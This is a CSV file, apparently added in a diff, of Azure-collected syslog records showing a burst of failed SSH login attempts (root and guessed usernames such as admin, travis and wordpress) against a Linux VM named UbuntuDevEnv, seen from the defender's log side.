+13564,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:54,UbuntuDevEnv,2019-06-26 04:42:54,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 95.216.195.95 port 54680 [preauth],130635,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,95.216.195.9,54680,,
+13565,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:56,UbuntuDevEnv,2019-06-26 04:42:55,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 39218 ssh2,130592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,39218,,
+13566,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:57,UbuntuDevEnv,2019-06-26 04:42:56,auth,UbuntuDevEnv,info,Invalid user dou from 200.6.188.38 port 16261,130650,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dou,200.6.188.3,16261,,
+13567,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:57,UbuntuDevEnv,2019-06-26 04:42:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38,130650,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.6.188.3,,0,
+13568,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:57,UbuntuDevEnv,2019-06-26 04:42:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,130650,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13569,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:58,UbuntuDevEnv,2019-06-26 04:42:58,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 39218: Too many authentication failures [preauth],130592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,39218,,
+13570,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:58,UbuntuDevEnv,2019-06-26 04:42:58,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 39218 ssh2 [preauth],130592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,39218,,
+13571,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:58,UbuntuDevEnv,2019-06-26 04:42:58,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 39218 ssh2,130592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,39218,,
+13572,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:58,UbuntuDevEnv,2019-06-26 04:42:58,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,130592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13573,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:58,UbuntuDevEnv,2019-06-26 04:42:58,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,130592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13574,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:59,UbuntuDevEnv,2019-06-26 04:42:58,auth,UbuntuDevEnv,info,Failed password for invalid user dou from 200.6.188.38 port 16261 ssh2,130650,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dou,200.6.188.3,16261,,
+13575,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:59,UbuntuDevEnv,2019-06-26 04:42:58,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 16261:11: Bye Bye [preauth],130650,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,16261,,
+13576,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:42:59,UbuntuDevEnv,2019-06-26 04:42:58,auth,UbuntuDevEnv,info,Disconnected from invalid user dou 200.6.188.38 port 16261 [preauth],130650,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dou,200.6.188.3,16261,,
+13577,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:01,UbuntuDevEnv,2019-06-26 04:43:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,130665,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13578,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:04,UbuntuDevEnv,2019-06-26 04:43:03,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 44941 ssh2,130665,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,44941,,
+13579,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:09,UbuntuDevEnv,2019-06-26 04:43:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,130681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13580,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:09,UbuntuDevEnv,2019-06-26 04:43:08,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 44941 ssh2],130665,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,44941,,
+13581,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:09,UbuntuDevEnv,2019-06-26 04:43:09,auth,UbuntuDevEnv,info,Invalid user travis from 119.123.240.8 port 54818,130681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,travis,119.123.240.8,54818,,
+13582,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:09,UbuntuDevEnv,2019-06-26 04:43:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.123.240.8,130681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.123.240.8,,0,
+13583,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:12,UbuntuDevEnv,2019-06-26 04:43:11,auth,UbuntuDevEnv,info,Failed password for invalid user travis from 119.123.240.8 port 54818 ssh2,130681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,travis,119.123.240.8,54818,,
+13584,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:12,UbuntuDevEnv,2019-06-26 04:43:12,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 44941 ssh2,130665,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,44941,,
+13585,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:13,UbuntuDevEnv,2019-06-26 04:43:12,auth,UbuntuDevEnv,info,Disconnected from invalid user travis 119.123.240.8 port 54818 [preauth],130681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,travis,119.123.240.8,54818,,
+13586,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:13,UbuntuDevEnv,2019-06-26 04:43:12,auth,UbuntuDevEnv,info,Received disconnect from 119.123.240.8 port 54818:11: Bye Bye [preauth],130681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.123.240.8,54818,,
+13587,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:15,UbuntuDevEnv,2019-06-26 04:43:14,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 44941 ssh2,130665,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,44941,,
+13588,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:17,UbuntuDevEnv,2019-06-26 04:43:17,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,130665,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13589,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:17,UbuntuDevEnv,2019-06-26 04:43:17,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 44941 ssh2,130665,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,44941,,
+13590,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:17,UbuntuDevEnv,2019-06-26 04:43:17,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,130665,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13591,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:17,UbuntuDevEnv,2019-06-26 04:43:17,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 44941: Too many authentication failures [preauth],130665,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,44941,,
+13592,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:17,UbuntuDevEnv,2019-06-26 04:43:17,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 44941 ssh2 [preauth],130665,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,44941,,
+13593,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:20,UbuntuDevEnv,2019-06-26 04:43:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,130740,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13594,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:22,UbuntuDevEnv,2019-06-26 04:43:21,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 50722 ssh2,130740,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,50722,,
+13595,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:28,UbuntuDevEnv,2019-06-26 04:43:27,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 50722 ssh2],130740,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,50722,,
+13596,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:28,UbuntuDevEnv,2019-06-26 04:43:27,auth,UbuntuDevEnv,info,Invalid user wordpress from 196.41.208.238 port 15206,130766,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wordpress,196.41.208.2,15206,,
+13597,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:28,UbuntuDevEnv,2019-06-26 04:43:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,130766,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13598,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:28,UbuntuDevEnv,2019-06-26 04:43:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.41.208.238,130766,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.41.208.2,,0,
+13599,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:30,UbuntuDevEnv,2019-06-26 04:43:29,auth,UbuntuDevEnv,info,Failed password for invalid user wordpress from 196.41.208.238 port 15206 ssh2,130766,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wordpress,196.41.208.2,15206,,
+13600,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:30,UbuntuDevEnv,2019-06-26 04:43:29,auth,UbuntuDevEnv,info,Received disconnect from 196.41.208.238 port 15206:11: Bye Bye [preauth],130766,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,15206,,
+13601,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:30,UbuntuDevEnv,2019-06-26 04:43:29,auth,UbuntuDevEnv,info,Disconnected from invalid user wordpress 196.41.208.238 port 15206 [preauth],130766,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wordpress,196.41.208.2,15206,,
+13602,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:30,UbuntuDevEnv,2019-06-26 04:43:29,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 50722 ssh2,130740,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,50722,,
+13603,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:36,UbuntuDevEnv,2019-06-26 04:43:35,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 50722 ssh2],130740,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,50722,,
+13604,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:36,UbuntuDevEnv,2019-06-26 04:43:35,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,130740,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13605,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:36,UbuntuDevEnv,2019-06-26 04:43:35,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 50722 ssh2 [preauth],130740,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,50722,,
+13606,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:36,UbuntuDevEnv,2019-06-26 04:43:35,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 50722: Too many authentication failures [preauth],130740,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,50722,,
+13607,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:36,UbuntuDevEnv,2019-06-26 04:43:35,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,130740,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13608,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:39,UbuntuDevEnv,2019-06-26 04:43:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,130805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13609,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:40,UbuntuDevEnv,2019-06-26 04:43:40,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 56481 ssh2,130805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56481,,
+13610,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:43,UbuntuDevEnv,2019-06-26 04:43:43,auth,UbuntuDevEnv,info,Invalid user admin from 177.23.90.10 port 37622,130819,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,177.23.90.1,37622,,
+13611,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:43,UbuntuDevEnv,2019-06-26 04:43:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=177.23.90.10,130819,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,177.23.90.1,,0,
+13612,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:43,UbuntuDevEnv,2019-06-26 04:43:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,130819,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13613,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:44,UbuntuDevEnv,2019-06-26 04:43:43,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 56481 ssh2,130805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56481,,
+13614,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:45,UbuntuDevEnv,2019-06-26 04:43:44,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 177.23.90.10 port 37622 ssh2,130819,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,177.23.90.1,37622,,
+13615,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:45,UbuntuDevEnv,2019-06-26 04:43:45,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 177.23.90.10 port 37622 [preauth],130819,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,177.23.90.1,37622,,
+13616,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:45,UbuntuDevEnv,2019-06-26 04:43:45,auth,UbuntuDevEnv,info,Received disconnect from 177.23.90.10 port 37622:11: Bye Bye [preauth],130819,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,177.23.90.1,37622,,
+13617,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:47,UbuntuDevEnv,2019-06-26 04:43:46,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 56481 ssh2,130805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56481,,
+13618,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:55,UbuntuDevEnv,2019-06-26 04:43:55,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 56481: Too many authentication failures [preauth],130805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,56481,,
+13619,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:55,UbuntuDevEnv,2019-06-26 04:43:55,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 56481 ssh2 [preauth],130805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56481,,
+13620,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:55,UbuntuDevEnv,2019-06-26 04:43:55,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 56481 ssh2],130805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56481,,
+13621,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:55,UbuntuDevEnv,2019-06-26 04:43:55,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,130805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13622,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:55,UbuntuDevEnv,2019-06-26 04:43:55,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,130805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13623,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:43:57,UbuntuDevEnv,2019-06-26 04:43:56,auth,UbuntuDevEnv,info,Connection closed by 119.123.240.8 port 58331 [preauth],130858,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.123.240.8,58331,,
